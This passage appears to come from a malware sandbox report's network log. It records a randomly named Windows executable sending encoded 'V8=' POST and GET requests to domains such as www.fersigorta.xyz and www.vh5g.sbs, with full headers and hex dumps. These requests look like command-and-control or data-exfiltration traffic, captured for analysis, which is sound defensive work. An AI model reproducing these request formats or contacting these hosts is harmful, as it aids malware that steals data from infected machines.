Jan 10, 2025 16:42:43.936732054 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 10 Jan 2025 15:42:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Trace: 2B1A9645E836DA16F8DD7CC6037B835F7FC2FFFD1F56941C22E61C784E00 Set-Cookie: _csrf=769a271172a1a33600c574635817d7b163ee9397884e6a4b356173dd8438dedba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22kN8BQdzrJHiDz2F7jvTAR5UZ6-2wG0eW%22%3B%7D; path=/; HttpOnly Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 61 71 74 2d 73 38 4e 37 41 68 72 45 72 32 34 62 39 52 6b 62 68 68 77 46 5a 6e 46 41 72 48 38 44 57 53 44 78 4c 4a 42 31 54 45 53 35 4a 57 34 6e 6d 6d 57 65 69 46 61 31 50 77 56 35 69 4a 5a 63 67 5a 42 32 4a 63 33 35 4b 59 37 53 62 47 7a 39 58 47 77 5a 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED] Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="eaqt-s8N7AhrEr24b9RkbhhwFZnFArH8DWSDxLJB1TES5JW4nmmWeiFa1PwV5iJZcgZB2Jc35KY7SbGz9XGwZg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
Jan 10, 2025 16:42:43.936772108 CET	18	IN	Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: y></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49988	47.254.140.255	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:46.764769077 CET	573	OUT	GET /rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.odvfr.info Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:42:47.376975060 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 10 Jan 2025 15:42:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Trace: 2B4F552EDAF337E5D7845D348EA10E745893F97286B7A63F0677EE1DD900 Set-Cookie: _csrf=219e8a8ce99fa31eb463941af2ec4cb7ba5d4d144b3a88777ee74154657dea82a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Ue2GhjZqRadBiFa74w7Ls5SA7NQhitfR%22%3B%7D; path=/; HttpOnly Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 6e 4c 4e 30 33 39 44 34 4a 57 75 47 7a 79 45 58 4a 56 2d 73 78 47 65 72 79 4d 37 5a 61 56 74 63 5a 46 71 6d 74 52 73 42 47 65 62 46 5f 2d 55 46 79 6d 36 35 50 78 36 57 4d 59 31 30 78 2d 45 4a 65 6d 59 62 30 68 51 39 69 78 47 33 7a 76 79 76 52 68 69 4e 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED] Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="znLN039D4JWuGzyEXJV-sxGeryM7ZaVtcZFqmtRsBGebF_-UFym65Px6WMY10x-EJemYb0hQ9ixG3zvyvRhiNQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
Jan 10, 2025 16:42:47.377021074 CET	18	IN	Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: y></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49989	85.159.66.93	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:52.662290096 CET	833	OUT	POST /2a2y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.fersigorta.xyz Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.fersigorta.xyz Referer: http://www.fersigorta.xyz/2a2y/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 2b 70 63 4e 34 68 50 53 71 6b 4b 39 39 6a 62 66 6e 32 39 79 5a 4c 56 57 50 67 67 50 4f 38 4e 68 45 56 65 52 59 77 71 7a 4a 6b 2b 39 6e 7a 69 53 43 4c 43 44 42 68 2b 52 41 31 31 76 7a 63 30 50 6a 53 6b 35 77 46 57 61 63 35 74 55 63 34 56 4f 39 33 4a 54 79 73 43 55 7a 4d 76 31 69 4c 58 38 62 64 49 6a 34 52 55 35 69 71 30 72 57 74 59 6d 31 6e 39 68 44 4c 7a 71 63 65 43 52 78 72 37 48 7a 47 35 48 33 47 43 34 4c 50 72 52 45 59 58 35 5a 6e 34 5a 46 30 46 6a 51 4e 69 69 52 30 50 57 55 66 46 57 48 78 4f 74 55 31 44 59 2b 74 79 71 42 2b 7a 4f 47 6c 5a 7a 45 31 57 46 52 4a 30 36 49 43 47 42 55 57 45 3d Data Ascii: V8=+pcN4hPSqkK99jbfn29yZLVWPggPO8NhEVeRYwqzJk+9nziSCLCDBh+RA11vzc0PjSk5wFWac5tUc4VO93JTysCUzMv1iLX8bdIj4RU5iq0rWtYm1n9hDLzqceCRxr7HzG5H3GC4LPrREYX5Zn4ZF0FjQNiiR0PWUfFWHxOtU1DY+tyqB+zOGlZzE1WFRJ06ICGBUWE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49990	85.159.66.93	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:55.218323946 CET	853	OUT	POST /2a2y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.fersigorta.xyz Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.fersigorta.xyz Referer: http://www.fersigorta.xyz/2a2y/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 2b 70 63 4e 34 68 50 53 71 6b 4b 39 76 53 72 66 67 56 46 79 4d 62 56 52 41 41 67 50 45 63 4d 6f 45 56 43 52 59 78 76 75 4f 57 71 39 6d 53 53 53 46 4b 43 44 4d 42 2b 52 55 6c 31 32 2b 38 30 45 6a 53 59 75 77 46 61 61 63 39 39 55 63 34 6c 4f 36 45 78 55 79 38 43 53 37 73 76 33 2f 62 58 38 62 64 49 6a 34 52 51 44 69 71 38 72 57 39 6f 6d 6e 57 39 69 64 62 7a 70 52 4f 43 52 31 72 37 44 7a 47 34 39 33 45 6d 65 4c 4a 76 52 45 5a 6e 35 5a 7a 55 61 4c 30 46 35 65 74 6a 75 57 31 57 2b 56 4d 56 35 46 51 48 76 43 33 62 36 32 37 44 41 62 63 37 6d 56 46 31 4c 55 6d 65 79 41 35 56 54 53 68 57 78 4b 42 52 55 67 7a 58 73 54 47 48 4f 75 33 37 66 4a 55 41 32 78 30 4c 46 Data Ascii: V8=+pcN4hPSqkK9vSrfgVFyMbVRAAgPEcMoEVCRYxvuOWq9mSSSFKCDMB+RUl12+80EjSYuwFaac99Uc4lO6ExUy8CS7sv3/bX8bdIj4RQDiq8rW9omnW9idbzpROCR1r7DzG493EmeLJvREZn5ZzUaL0F5etjuW1W+VMV5FQHvC3b627DAbc7mVF1LUmeyA5VTShWxKBRUgzXsTGHOu37fJUA2x0LF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49991	85.159.66.93	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:57.765121937 CET	1870	OUT	POST /2a2y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.fersigorta.xyz Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.fersigorta.xyz Referer: http://www.fersigorta.xyz/2a2y/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 2b 70 63 4e 34 68 50 53 71 6b 4b 39 76 53 72 66 67 56 46 79 4d 62 56 52 41 41 67 50 45 63 4d 6f 45 56 43 52 59 78 76 75 4f 57 53 39 6e 67 71 53 44 70 71 44 4e 42 2b 52 58 6c 31 72 2b 38 30 6a 6a 53 77 69 77 46 47 4b 63 2f 31 55 64 5a 46 4f 37 31 78 55 38 38 43 53 33 4d 76 30 69 4c 58 74 62 64 59 6e 34 52 67 44 69 71 38 72 57 37 73 6d 6c 48 39 69 66 62 7a 71 63 65 43 56 78 72 37 72 7a 48 51 48 33 45 6a 6a 4c 35 50 52 46 35 33 35 65 41 73 61 55 45 46 2f 5a 74 69 7a 57 31 71 68 56 4d 4a 66 46 51 7a 52 43 31 4c 36 6d 37 4f 66 49 65 6a 61 50 58 35 61 59 6e 69 79 55 4e 4a 55 56 43 57 43 47 77 68 47 6e 33 66 76 53 52 58 32 6b 55 57 48 59 53 73 38 67 67 32 2f 46 2b 47 69 35 48 46 76 38 4f 38 56 4a 6d 33 42 37 6c 59 42 42 70 4e 41 58 4d 30 4c 4f 36 6b 35 4a 65 41 77 34 5a 76 2f 78 7a 58 30 67 45 52 34 48 64 4b 47 63 73 67 37 4f 6c 75 63 36 2b 33 6d 56 35 46 33 7a 33 49 76 6a 4f 43 57 48 61 58 31 52 56 4f 64 72 51 53 73 37 46 2b 6b 4b 6b 5a 78 4b 68 2f 34 76 4e 5a 32 57 57 6d 73 38 44 5a 4c 43 58 44 [TRUNCATED] Data Ascii: V8=+pcN4hPSqkK9vSrfgVFyMbVRAAgPEcMoEVCRYxvuOWS9ngqSDpqDNB+RXl1r+80jjSwiwFGKc/1UdZFO71xU88CS3Mv0iLXtbdYn4RgDiq8rW7smlH9ifbzqceCVxr7rzHQH3EjjL5PRF535eAsaUEF/ZtizW1qhVMJfFQzRC1L6m7OfIejaPX5aYniyUNJUVCWCGwhGn3fvSRX2kUWHYSs8gg2/F+Gi5HFv8O8VJm3B7lYBBpNAXM0LO6k5JeAw4Zv/xzX0gER4HdKGcsg7Oluc6+3mV5F3z3IvjOCWHaX1RVOdrQSs7F+kKkZxKh/4vNZ2WWms8DZLCXDXesUUA5OxTPqpRLTZp7OwSX9zo/Q+9Kb8ndJNL7dJVWcWSJuJEurOxCssteJL6ji8zcLd0zzJ6DQFMIa5L7wRILUhTCgvy/Uw6Dl0NWnqvvkYHyoRCDJsbL5XsWJPa8WknAXOXuKjECBgDcxrf5Q6treIsgouNj6aYRwjHKSZZ9duz8xm4Ofa5FdR/qIuiPsdiYLtnTAWVt0N9uPmJXBeIu9t6JHv/QVPTtonegpDwHBGO/C8C2Gy/zwI8L23AOLR8VUgb7/f9eDwZL9sWpphnE07wnxx8q/ePKsfN5QT/NUWXe14wtZQGQjJZXxaYD21zWTsGoNuBpfMS7GBTe2PgQ7HCwBjG8ASR+ecQeAT7o398UZTX08AI5SJ9k/MEJqn7yG0/Myr1VLeu6Z+ICbw7EC+/o1FSyO6pSf7/oVwX7KW2uG/oNJPu2AEMHq8V+3SxEfG6vuvJVF9WNeNw0Fjh/3pJv65fmFajwYUpAGpMYGuEdmxX0bclVvtoUKX11eFzHM7pW4z6j1fEcMtsvxAwgSz+e2wXR4WdmMfN+Fdt41OpvaLcG9vRo8ahKbJ6qeE1DaUuRosSEb7BdT8idaTbrxYKDbqgK2/t3SARd5v3YkgP+JClTNeTI7FQ0LAFfcDVn0aJBSvFUImZNlPZjunMwTfwLej+z2ze [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49992	85.159.66.93	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:00.304539919 CET	577	OUT	GET /2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHa HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.fersigorta.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:43:01.012867928 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 10 Jan 2025 15:43:00 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-10T15:43:05.9036713Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49993	188.114.97.3	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:06.069935083 CET	815	OUT	POST /rjsl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vh5g.sbs Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.vh5g.sbs Referer: http://www.vh5g.sbs/rjsl/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 68 7a 63 41 42 73 48 34 65 55 48 2b 49 51 34 58 57 6e 6c 69 49 35 72 4f 6b 57 35 36 4b 51 73 31 69 56 77 67 6d 42 43 6e 72 59 33 32 76 74 76 58 56 64 4a 70 51 39 4f 44 4c 76 47 2b 2f 66 36 64 61 56 4c 74 63 6f 4d 4a 53 36 39 68 61 4b 57 7a 72 45 4d 5a 73 39 37 68 72 44 71 61 6f 73 79 55 4e 62 70 70 57 6c 62 30 64 74 50 43 30 36 4a 65 5a 61 5a 59 50 70 77 36 72 43 4f 77 52 59 30 55 45 75 49 64 72 4f 57 45 63 5a 48 66 36 30 2f 56 66 42 4f 58 50 64 45 42 36 42 55 31 36 39 47 52 46 77 73 69 65 46 33 51 64 38 49 59 44 44 55 50 2f 2b 6a 52 6f 45 64 36 43 6e 48 43 77 55 53 48 50 77 74 74 77 43 30 3d Data Ascii: V8=hzcABsH4eUH+IQ4XWnliI5rOkW56KQs1iVwgmBCnrY32vtvXVdJpQ9ODLvG+/f6daVLtcoMJS69haKWzrEMZs97hrDqaosyUNbppWlb0dtPC06JeZaZYPpw6rCOwRY0UEuIdrOWEcZHf60/VfBOXPdEB6BU169GRFwsieF3Qd8IYDDUP/+jRoEd6CnHCwUSHPwttwC0=
Jan 10, 2025 16:43:06.731039047 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:43:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.vh5g.sbs/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pc%2BDWhbJosABJHjXLBnEvuHq37%2FwNbbjkOexN2lDcRglgYBK71mIzj99NfOila8gAB%2FqqUObs5QDsxSn8%2FHS7c1163%2F0DFt912eBHlco1aKYn39Hn2viF2LAwTUQz%2FI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc7e17b1a4304-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body>
Jan 10, 2025 16:43:06.731060028 CET	18	IN	Data Raw: 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49994	188.114.97.3	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:08.623779058 CET	835	OUT	POST /rjsl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vh5g.sbs Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.vh5g.sbs Referer: http://www.vh5g.sbs/rjsl/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 68 7a 63 41 42 73 48 34 65 55 48 2b 4c 7a 67 58 55 41 78 69 50 5a 72 4e 76 32 35 36 42 77 74 38 69 56 30 67 6d 46 61 33 72 4b 54 32 76 4a 72 58 55 59 31 70 58 39 4f 44 45 2f 47 78 69 50 37 52 61 56 48 6c 63 70 67 4a 53 36 35 68 61 49 2b 7a 72 7a 67 59 74 74 37 6e 2b 54 71 55 6c 4d 79 55 4e 62 70 70 57 6c 2f 4f 64 74 58 43 30 4c 35 65 59 37 5a 5a 46 4a 77 6c 73 43 4f 77 47 49 30 51 45 75 49 2f 72 50 36 69 63 63 62 66 36 30 50 56 65 51 4f 51 47 64 45 44 6e 52 56 31 30 50 72 68 4a 43 30 79 54 6a 47 4e 42 74 38 77 47 31 6c 6c 6c 63 72 35 37 6b 78 43 53 30 50 31 68 6b 7a 75 56 54 39 64 75 56 67 7a 4d 54 32 64 2b 6c 6c 6d 51 6d 52 4a 66 50 47 36 39 34 4e 38 Data Ascii: V8=hzcABsH4eUH+LzgXUAxiPZrNv256Bwt8iV0gmFa3rKT2vJrXUY1pX9ODE/GxiP7RaVHlcpgJS65haI+zrzgYtt7n+TqUlMyUNbppWl/OdtXC0L5eY7ZZFJwlsCOwGI0QEuI/rP6iccbf60PVeQOQGdEDnRV10PrhJC0yTjGNBt8wG1lllcr57kxCS0P1hkzuVT9duVgzMT2d+llmQmRJfPG694N8
Jan 10, 2025 16:43:09.258049965 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:43:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.vh5g.sbs/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWinsN31JzsQZw7JzKqeKTpg7lqpIJI2rxWHtydEFrmrakF8qtHuq3CqEEtIZjdmDTUqlbWZX%2B3LzkR8D5oKYTTKvWQxwN0zMKSRiDWSmc50JyXcdun3qcNCkRPgsIE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc7f16fc072bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1865&min_rtt=1865&rtt_var=932&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Jan 10, 2025 16:43:09.258068085 CET	8	IN	Data Raw: 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49995	188.114.97.3	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:11.199774027 CET	1852	OUT	POST /rjsl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vh5g.sbs Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.vh5g.sbs Referer: http://www.vh5g.sbs/rjsl/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 68 7a 63 41 42 73 48 34 65 55 48 2b 4c 7a 67 58 55 41 78 69 50 5a 72 4e 76 32 35 36 42 77 74 38 69 56 30 67 6d 46 61 33 72 4b 62 32 76 36 6a 58 56 2f 68 70 57 39 4f 44 48 2f 47 6c 69 50 36 4c 61 57 33 68 63 70 39 79 53 34 78 68 63 70 65 7a 67 6e 30 59 6e 74 37 6e 6d 6a 71 56 6f 73 7a 4f 4e 61 5a 74 57 6c 76 4f 64 74 58 43 30 49 68 65 59 71 5a 5a 57 5a 77 36 72 43 4f 73 52 59 30 30 45 75 42 64 72 50 4f 79 63 76 44 66 36 55 66 56 54 44 6d 51 45 39 45 37 6d 52 56 62 30 50 6e 2b 4a 43 34 2b 54 6e 4f 6e 42 71 51 77 46 45 35 7a 36 39 44 52 6d 57 70 4e 5a 31 48 70 67 43 37 58 61 79 68 51 70 56 4d 50 47 54 65 6a 7a 67 68 36 54 43 41 6c 4c 62 6d 33 2f 4d 30 52 59 2b 38 42 37 73 66 37 39 69 37 6d 4f 54 71 70 55 67 64 50 47 38 47 63 35 75 30 66 6c 2f 48 34 61 4a 36 31 4d 53 51 74 52 46 65 76 